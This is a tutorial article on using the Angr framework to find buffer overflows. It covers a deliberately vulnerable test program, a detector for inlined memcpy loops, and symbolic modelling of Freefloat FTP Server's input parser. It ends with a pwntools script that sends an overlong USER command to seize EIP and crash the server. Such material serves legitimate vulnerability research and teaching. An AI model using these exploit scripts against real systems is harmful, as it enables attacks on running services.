info
More information about Angr can be found in my previous article: Anger management. Welcome to Angr, a symbolic emulation framework.
Unconstrained
Let’s write and build a test object: a small program a priori vulnerable to buffer overflow. Build flags ensure a static ImageBase and the absence of a stack canary, which makes hacker’s life much easier.
// gcc exp2.c -m32 -fno-stack-protector -no-pie -o exp2_32#include <stdio.h>#include <string.h>#include <stdlib.h>void win(){ printf("Win!\n");}void func(int key){ char buf[32]; printf("overflow me : "); gets(buf);}int main(int argc, char* argv[]){ func(1); return 0;}
The code stores the input string in a local buffer. Your task is to overflow this buffer in a way that transfers the control flow to the win
function.
08049196 int32_t win()080491b3 e8b8feffff call puts080491c1 char* func()080491c1 55 push ebp {__saved_ebp}080491c2 89e5 mov ebp, esp {__saved_ebp}080491c4 53 push ebx {__saved_ebx}080491c5 83ec24 sub esp, 0x24080491e8 8d45d8 lea eax, [ebp-0x28 {buf}]080491eb 50 push eax {buf} {var_3c}080491ec e86ffeffff call gets080491f8 c9 leave {__saved_ebp}080491f9 c3 retn {__return_addr}080491fa int32_t main(int32_t argc, char** argv, char** envp)08049218 68efbeadde push 0x10804921d e89fffffff call func08049222 83c410 add esp, 0x10
Let’s find out the actual addresses using a debugger. At the entry point of the func(
function, the return address is on top of the stack. The prologue saves the old EBP on the stack and then subtracts 0x24 from ESP, thus, creating a ‘pocket’ for local data on the stack.
0xffffd6a0: 00 00 00 00 # buf# (...) local variables0xffffd6c4: 00 80 f9 f7 # old EBX0xffffd6c8: e8 d6 ff ff # old EBP0xffffd6cc: 22 92 04 08 # ret addr -> 0x08049222
The stack looks quite conventionally. Let’s try to override the return address.
import angrimport claripyproject = angr.Project('exp2_32', auto_load_libs=False)symbolic_input = claripy.BVS("input", 48 * 8)initial_state = project.factory.entry_state(stdin=symbolic_input, args=['./a.out'])initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_MEMORY')initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_REGISTERS')def is_fully_symbolic_pc(state): for i in range(state.arch.bits): if not state.solver.symbolic(state.regs.pc[i]): return False return Truesimulation = project.factory.simgr( initial_state, save_unconstrained=True, stashes={ 'active' : [initial_state], 'unconstrained' : [], 'found' : [], 'not_needed' : [] } )def is_successful(state): return simulation.unconstrainedsimulation.explore(find=is_successful)solution_state = simulation.unconstrained[0]if is_fully_symbolic_pc(solution_state): solution_state.add_constraints(solution_state.regs.eip == 0x8049196) solution = solution_state.solver.eval(symbolic_input,cast_to=bytes) print('input:', solution)
The script searches for such input data that will transfer control to address 0x8049196. How does it work? You start the simulation and wait for the unconstrained
box to be filled. It contains states with more than 256 possible destination addresses the control flow can be transferred to. In most cases, this means that the EIP register partially or completely depends on symbolic variables under your control. Just in case, you can check whether each bit of the EIP register is symbolic. Then you set a constraint: the register must be equal to a certain value. After that, you start concretization of solutions.
input: b’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x91\x04\x08′
First of all, let’s check whether everything works properly. Pwntools can be used for this purpose:
from pwn import *p = process('./exp2_32')buff = b'\x00' * 44 + b'\x96\x91\x04\x08'p.sendline(buff)print(p.recv())
Getting the much-anticipated result:
$ python test_exp2.py
[+] Starting local process ‘./exp2_32’: pid 9178b’overflow me : Win!\n’
[*] Stopped process ‘./exp2_32’ (pid 9178)Writing VEX analyzer
Overflows frequently occur in functions like strcpy
. If they are imported from external libraries, it’s not a big deal to find them and check their usage manually. However, optimizing compilers often replace them with inline versions.
If the compiler is popular and widespread, IDA Pro will find strcpy
by Flirt signatures. But if you change a few compiler flags or use an unfamiliar version, IDA becomes blind. Let’s write a universal solution applicable to any compiler, regardless of processor architecture and build flags.
The strcpy
function is often implemented as memcpy
with strlen
performing preliminary string length calculation. But optimized (e.g. in Visual Studio) versions are also available:
@loop:mov cl, byte [eax]lea eax, [eax+0x1]mov byte [edx+eax-0x1], cltest cl, cljne @loop
As can be seen, the code performs three operations:
- read a byte at a certain address;
- write the received byte to another address; and
- return control to the beginning of the loop.
Each operation represents a primitive (i.e. an indivisible logical block that can be found in VEX code) First, let’s find a loop and then check whether it contains a read operation followed by a write operation applied to the read bytes.
import angrpath = 'bin/vs2017'proj = angr.Project(path, auto_load_libs=False)bin_cfg = proj.analyses.CFGFast(force_complete_scan=False)def get_exits(block): node = bin_cfg.get_any_node(block.addr) return [x.addr for x in node.successors]def print_node(block): for x in block.vex.constant_jump_targets: print(hex(block.addr), hex(x))def is_cycled_node(block): return block.addr in get_exits(block)def is_load_byte(s): if s.tag == 'Ist_WrTmp': if s.data.tag == 'Iex_Load': if s.data.type == 'Ity_I8': return Truedef is_store_byte(s): if s.tag == 'Ist_Store': if s.data.tag == 'Iex_RdTmp': return Truedef is_memcpy_node(block): tmp_ids = [] for s in block.vex.statements: if is_load_byte(s): tmp_ids.append(s.tmp) continue if is_store_byte(s): if tmp_ids: if s.data.tmp in tmp_ids: return Trueprint('Analyse:', path)nodes_addr = [x.addr for x in bin_cfg.nodes_iter()]for addr in nodes_addr: block = proj.factory.block(addr) if is_cycled_node(block): if is_memcpy_node(block): block.pp()
In Angr, a basic block is a piece of code located before the command that transfers control. The algorithm is as follows: you analyze each block found by CFGFast; then you check whether the block has an exit that transfers the control flow to its own beginning (a primitive loop); after that, you analyze the VEX code by listing all commands inside the block; next, you find the read operation and remember the variable where the data are placed; and finally, you find the write operation and check where the same variable is used both in the read and write operations.
Importantly: you are looking for a read operation applied to one byte by specifying the data type as Ity_I8
. By changing the size, you can filter out other loop implementations. But for the sake of simplicity, let’s stop there. Time to apply the script to a file with memcpy
compiled in Visual Studio.
Analyse: bin/vs2017
401160 mov cl, byte ptr [esp+eax+0x68]
401164 lea eax, [eax+0x1]
401167 mov byte ptr [esp+eax-0x1], cl
40116b test cl, cl
40116d jne 0x401160
Experiments with other files bring additional variants.
402f6c rep movsb byte ptr es:[edi], byte ptr [esi]
4022a7 rep movsd dword ptr es:[edi], dword ptr [esi]
100093e4 mov al, byte ptr [edi+esi]
100093e7 mov byte ptr [esi], al
100093e9 inc esi
100093ea sub ecx, 0x1
100093ed jne 0x100093e4
100069c1 mov edx, dword ptr [esi]
100069c3 mov dword ptr [edi], edx
100069c5 lea esi, [esi+0x4]
100069c8 lea edi, [edi+0x4]
100069cb dec eax
100069cc jne 0x100069c1
100069b3 mov dl, byte ptr [esi]
100069b5 mov byte ptr [edi], dl
100069b7 inc esi
100069b8 inc edi
100069b9 dec ecx
100069ba jne 0x100069b3
1000c270 mov al, byte ptr [esi+edx]
1000c273 mov byte ptr [ebp+edx-0xc], al
1000c277 inc edx
1000c278 cmp edx, ecx
1000c27a jl 0x1000c270
1000687c sub edi, 0x4
1000687f sub esi, 0x4
10006882 mov eax, dword ptr [esi]
10006884 mov dword ptr [edi], eax
10006886 sub ecx, 0x4
10006889 test ecx, 0xfffffffc
1000688f jne 0x1000687c
10006851 sub esi, 0x20
10006854 sub edi, 0x20
10006857 movdqu xmm0, xmmword ptr [esi]
1000685b movdqu xmm1, xmmword ptr [esi+0x10]
10006860 movdqu xmmword ptr [edi], xmm0
10006864 movdqu xmmword ptr [edi+0x10], xmm1
10006869 sub ecx, 0x20
1000686c test ecx, 0xffffffe0
10006872 jne 0x10006851
In my humble opinion, the result is quite decent. You can find not only inline functions, but also makeshift memcpy
functions that often contain implementation errors.
Attacking an application
I am going to use Freefloat FTP Server (zip) as a target; this is a classic example used by novice hackers programmers to polish their buffer overflow skills. Objectively, the easiest way to crash it is to write a protocol fuzzer. But I found it interesting and instructive to do this in a new way.
Debugging difficult cases
The first thing you can do is enable debug messages:
import logginglogging.getLogger('angr').setLevel('DEBUG')
In addition, some state flags (e.g. TRACK_MEMORY_ACTIONS
) add debug messages to state.
.
But I recommend debugging in PyCharm: it enables you to look inside Angr in the course of execution, which is really helpful.
You cannot start emulation from the very beginning of the program since it would take huge amounts of memory and time. First, you have to choose an entry point. The moment when the data are received (i.e. WS2_32.
) seems to be the ideal variant.
When you go two calls deeper into the IDA pseudocode, you see the function that parses the input at 0x402190. This is a class method, and the structure with all its data is passed to this class via ECX. I reconstructed it in IDA:
struct __fixed struct_ecx // sizeof=0x634{ __int32 SOCKET; __int32 PORT; __int32 CLIENT_PORT; // 0 __int32 field_C; // 0 __int32 field_10; // 0 char *INPUT_ptr_1024; // XREF: build_input_str+8/r // parse_input_str+11/r __int32 INPUT_end; // XREF: build_input_str+5/r char str_USERNAME_a[128] __strlit(C,"UTF-8"); char str_PASSWORD_a[128] __strlit(C,"UTF-8"); char str_answer_w[260] __strlit(C,"UTF-8"); char not_used[260] __strlit(C,"UTF-8"); char str_answer_2_w[520] __strlit(C,"UTF-8"); char str_answer_a[260] __strlit(C,"UTF-8"); __int32 IS_TYPE_I; // set to 1 in INIT};
The code that fills out the initial structure can be found at the very beginning of the thread. Using the New
operator, memory for it is allocated from the heap; then a second buffer 1024 bytes in size is allocated there; and a reference to it is placed inside the structure in INPUT_ptr_1024
.
Your objective is to simulate the creation of this structure using your own code:
import angrpath = 'bin/FTPServer.exe'project = angr.Project(path, auto_load_libs=False)EIP_START = 0x402190initial_state = project.factory.blank_state(addr=EIP_START)initial_state.options.add('ZERO_FILL_UNCONSTRAINED_MEMORY')initial_state.options.add('ZERO_FILL_UNCONSTRAINED_REGISTERS')FAKE_INPUT_ADDR = 0x38000FAKE_STRUCT_ADDR = 0x39000FAKE_STRUCT_SIZE = 0x10000bvs_input = initial_state.solver.BVS("bvs_input", 8*1024)initial_state.memory.store(FAKE_STRUCT_ADDR, b'\x00' * FAKE_STRUCT_SIZE, FAKE_STRUCT_SIZE)initial_state.memory.store(FAKE_INPUT_ADDR, bvs_input)angr.types.register_types(angr.types.parse_type('struct ftp_this { char unknown[0x14]; char * str_ptr; }'))initial_state.mem[FAKE_STRUCT_ADDR].struct.ftp_this.str_ptr = FAKE_INPUT_ADDRinitial_state.regs.ecx = FAKE_STRUCT_ADDR
You create a new state at the entry of the parser. Then you ask Angr to fill uninitialized registers and memory areas with zeros. After that, you create a symbolic variable and substitute the input string with it. Angr supports interaction with structures; so, you can use them to write str_ptr
.
step_count = 0def next_step(sim_mngr): global step_count active = sim_mngr.stashes['active'] print(f'\nstep_count: {step_count}, active: {len(active)}') step_count += 1simulation = project.factory.simgr(initial_state)simulation.explore(step_func=next_step)
If you run a test simulation, you’ll see that the number of active states quickly becomes greater than 300 (not to mention 8 gigabytes of RAM consumed by this process).
Avoiding path explosion
Let’s examine a possible implementation of strcpy
:
while((*dst_ptr++ = *src_ptr++) != '\0');
Everything is simple when you are dealing with specific values, but if the string src_ptr
is symbolic, then a fork occurs at each step of copying: exit the loop or go through another round.
Standard path searching will create two states for each iteration. In other words, to successfully ‘copy’ a symbolic string 128 bytes in size, 256 possible paths are required, and 255 of them lead to wrong places. And if the string is subsequently copied a few more times, then the number of possible paths increases to 2563!
Therefore, if you use standard path searching, it would take forever to create a complete copy of a long string. Let’s write a selection algorithm that goes through cycles to a specified limit without transferring control before the due time.
class LoopHolder: def __init__(self, max_depth=15): self.max_depth = max_depth def _is_loop(self, state, item): block_size = state.block().size return (item.addr >= state.addr) and (item.addr < state.addr+block_size) def _get_loop_in_list(self, state, succ_list): for item in succ_list: if self._is_loop(state, item): return item def _count_prev_iter(self, state): count = 0 for item in reversed(state.history.bbl_addrs): if item == state.addr: count += 1 else: break return count def _process_loop(self, state, succ_list): next_loop = self._get_loop_in_list(state, succ_list) if not next_loop: return succ_list prev_count = self._count_prev_iter(next_loop) if prev_count: if prev_count >= self.max_depth: succ_list.remove(next_loop) return succ_list else: return [next_loop] else: return [next_loop] def _filter_succ(self, state, succ_list): if len(succ_list) == 1: return succ_list if len(succ_list) > 1: return self._process_loop(state, succ_list[:]) return [] def _remove_old_state(self, sim_succ, old_active): for item in old_active: sim_succ.successors.remove(item) sim_succ.flat_successors.remove(item) sim_succ.all_successors.remove(item) def _add_new_state(self, sim_succ, new_active): sim_succ.successors += new_active sim_succ.flat_successors += new_active sim_succ.all_successors += new_active def replace_succ(self, state, sim_succ): active = sim_succ.successors[:] if active: new_active = self._filter_succ(state, active) self._remove_old_state(sim_succ, active) self._add_new_state(sim_succ, new_active) return sim_succ
Angr makes it possible to replace almost any part of built-in algorithms with your own ones; in this particular case, let’s replace the successors
function. It takes a specific state and returns addresses where the control flow will be transferred next.
loop_filter = LoopHolder(300)unconstrained_state = Nonedef successor_func(state, **run_args): old_succ = state.project.factory.successors(state, **run_args) if old_succ.unconstrained_successors: global unconstrained_state unconstrained_state = old_succ.unconstrained_successors[0] return loop_filter.replace_succ(state, old_succ)simulation = project.factory.simgr(initial_state)simulation.explore(successor_func=successor_func)
The algorithm detects the presence of a loop and counts the number of iterations: if their number has reached the maximum depth, it exits; if the number of iterations is less, it continues running the loop.
Also, let’s substitute successor_func
to remember the found unconstrained state: you won’t be able to find it in another place.
Configuring libc
If a function of the strlen
type is taken from an external import, it will be replaced by a stub.
project.hook(0x403d70, angr.SIM_PROCEDURES['libc']['strncmp']())
In such a case, a different symbolic variable concretization strategy is used:
state.libc.buf_symbolic_bytes = 256state.libc.max_str_len = 256
The exact size of the string is configured in the emulator state! I spent several days on debugging before making this discovery, and now I’m sharing it with you to save your time.
Reducing the number of states
simulation = project.factory.simgr(initial_state)simulation.explore(successor_func=successor_func, find=0x402212)state = simulation.found[0]simulation2 = project.factory.simgr(state)simulation2.explore(successor_func=successor_func)
The next step towards optimization is to limit the number of states to be examined. There are several branches inside the parser; each of them checks its own command: first QUIT
, then USER
, and so on. There is no point in going through all the commands simultaneously; instead, it’s better to perform a deep emulation of each command separately. First of all, let’s find the state at address 0x402212: it corresponds to the USER
command branch.
Then you continue emulation without a specific goal. But if everything goes according to the plan, then at the end of the emulation (i.e. when all states reach ret
of the first function), you’ll find unconstrained_state
:
EIP_GOAL = 0x44444444 # 'DDDD'if unconstrained_state: state = unconstrained_state if state and is_fully_symbolic_pc(state): state.add_constraints(state.regs.eip == EIP_GOAL) solution = state.solver.eval(bvs_input, cast_to=bytes) print('bvs_input:', solution.rstrip(b"\x00"))
The code displays the input string that will enable you to seize control over execution.
bvs_input: b’USER \x01\x01 (…) DDDD (…)’
Testing the exploit
Running the script:
from pwn import *exploit = b'USER ' + b'\x01' * 230 + b'DDDD' + b'\r\n'conn = remote('127.0.0.1', 21)conn.recvline()conn.send(exploit)conn.recvuntil(b' ', drop=True)conn.recvline()conn.close()
It connects to the FTP server and crashes it. Congrats!